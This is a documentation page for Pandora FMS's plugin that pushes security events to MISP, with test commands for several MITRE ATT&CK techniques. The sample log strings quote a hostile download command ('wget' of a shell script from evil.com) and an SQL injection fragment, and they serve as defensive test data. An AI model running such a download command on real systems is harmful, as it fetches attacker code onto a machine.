Skip to main content

Manual Execution

Before enabling automatic integration, it is highly recommended to perform manual tests from the Pandora FMS server terminal. This allows you to verify connectivity with MISP and see how the auto-classification engine (Triage) analyzes raw logs to assign threat levels and MITRE ATT&CK tactics.

Replace https://misp.yourdomain.com and YOUR_API_KEY with your actual environment credentials before running the commands.

1. Public Application Exploitation (MITRE T1190)

Detects SQL Injection or XSS attempts.

python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "Web_Server_Apache" -n "SQL Injection Attempt" \
-d "Detected attack: select * from users in login.php from IP 192.168.1.100"

2. Transfer of Malicious Tools (MITRE T1105)

Detects suspicious download commands in the terminal.

python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "Linux_App_Server" -n "Payload Download" \
-d "Suspicious execution: wget http://evil.com/shell.sh initiated by 10.0.0.50"

3. User / Malware Execution (MITRE T1204)

Detects antivirus alerts or quarantines.

python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "Windows_Endpoint_01" -n "Malware Infection" \
-d "Antivirus alert: malware trojan quarantined. Download source: 198.51.100.44"

4. Valid Accounts / Impossible Travel (MITRE T1078)

Detects anomalies in login attempts.

python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "VPN_Gateway" -n "Impossible Travel Detected" \
-d "Security alert: impossible travel VPN login from malicious IP 203.0.113.42"

5. Phishing / Spearphishing (MITRE T1566)

Classifies attacks received by email.

python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "Mail_Exchange" -n "Malicious Email" \
-d "Email filter: malicious attachment blocked from sender with IP 203.0.113.99"

6. Brute Force (MITRE T1110)

Detects repeated failed authentication attempts.

python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "SSH_Server" -n "Brute Force Attack" \
-d "Raw log: Failed password for root from 192.168.1.200 port 22 ssh2"

7. Advanced Execution (Override Triage)

If you prefer to ignore automatic classification and force your own values, use the optional parameters. In this example, we force TLP Red, threat level High (1), share with the community (1), manually assign category, and add custom tags.

python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "Main_Firewall" -n "Custom Critical Attack" \
-d "Custom alert: denial of service from 10.10.10.10" \
-t "tlp:red" \
-s 1 \
-l 1 \
-c "Network activity" \
-g "SOC-Team, Critical-Alert, misp-galaxy:mitre-attack-pattern=\"Network Denial of Service - T1498\""

What this example does:

  • -t "tlp:red": Labels the event as TLP Red

  • -s 1: Shares the event with MISP Community

  • -l 1: Forces Threat Level to High

  • -c "Network activity": Categorizes the IP in this MISP category

  • -g "..., misp-galaxy:mitre-attack-pattern=...": Adds custom tags and MITRE ATT&CK galaxy mapping

8. Verification

After running any command, the script returns 1 (success) or 0 (error) in the console. To check details, review the plugin log:

tail -f /var/log/pandora/pandora_misp_integration.log

image.png

Finally, access your MISP web console to see the newly created event with the extracted IP and corresponding MITRE tags.

Back to top